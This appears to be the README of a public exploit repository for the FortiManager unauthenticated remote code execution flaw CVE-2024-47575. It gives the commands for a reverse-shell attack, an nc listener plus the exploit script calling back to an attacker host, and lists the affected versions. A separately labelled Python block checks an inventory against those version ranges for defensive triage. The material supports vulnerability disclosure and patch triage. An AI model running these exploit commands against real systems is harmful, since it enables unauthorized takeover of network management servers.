Fortinet FortiManager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575

watchtowrlabs/Fortijump-Exploit-CVE-2024-47575

CVE-2024-47575

Fortinet FortiManager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575

See our blog post for technical details

To begin, establish your ncat session:

nc -lvvnp 80

Then, execute our detection artefact generator:

python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit

To check only whether the target is vulnerable, use the following options:

python3 CVE-2024-47575.py --target 192.168.1.110 --action check

Affected Versions

FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4
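
A defender-side triage check built from the affected-version list above, as an added example that is not part of the watchTowr repository: it flags inventory entries whose version falls inside a listed range. The host names and inventory rows are constructed, and "FortiManager Cloud 6.4" is assumed to mean every 6.4.x release.

```python
import re

# Inclusive (low, high) ranges transcribed from the affected-version list above.
AFFECTED = {
    "FortiManager": [
        ((7, 6, 0), (7, 6, 0)),
        ((7, 4, 0), (7, 4, 4)),
        ((7, 2, 0), (7, 2, 7)),
        ((7, 0, 0), (7, 0, 12)),
        ((6, 4, 0), (6, 4, 14)),
        ((6, 2, 0), (6, 2, 12)),
    ],
    "FortiManager Cloud": [
        ((7, 4, 1), (7, 4, 4)),
        ((7, 2, 1), (7, 2, 7)),
        ((7, 0, 1), (7, 0, 12)),
        # Assumption: the bare "6.4" entry covers every 6.4.x release.
        ((6, 4, 0), (6, 4, float("inf"))),
    ],
}

def parse_version(text):
    """Extract (major, minor, patch) from strings such as 'v7.4.3-build1'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version found in {text!r}")
    return tuple(int(part) for part in m.groups())

def is_affected(product, version_text):
    """True if the version is inside a listed range. False only means
    'not in this list', not that the release is known to be fixed."""
    if product not in AFFECTED:
        raise ValueError(f"unknown product {product!r}")
    version = parse_version(version_text)
    return any(low <= version <= high for low, high in AFFECTED[product])

# Constructed sample inventory: (host, product, reported version string).
INVENTORY = [
    ("fmg-dc1", "FortiManager", "v7.4.4-build1"),
    ("fmg-dc2", "FortiManager", "7.4.5"),
    ("fmg-lab", "FortiManager", "v6.2.12"),
    ("fmg-cloud-a", "FortiManager Cloud", "7.4.0"),
    ("fmg-cloud-b", "FortiManager Cloud", "6.4.9"),
]

def triage(inventory):
    """Return the sorted host names whose version is in an affected range."""
    return sorted(h for h, prod, ver in inventory if is_affected(prod, ver))

if __name__ == "__main__":
    print("In an affected range:", ", ".join(triage(INVENTORY)))
```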

Exploit authors

This exploit was written by Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)

Follow watchTowr Labs

For the latest security research follow the watchTowr Labs Team
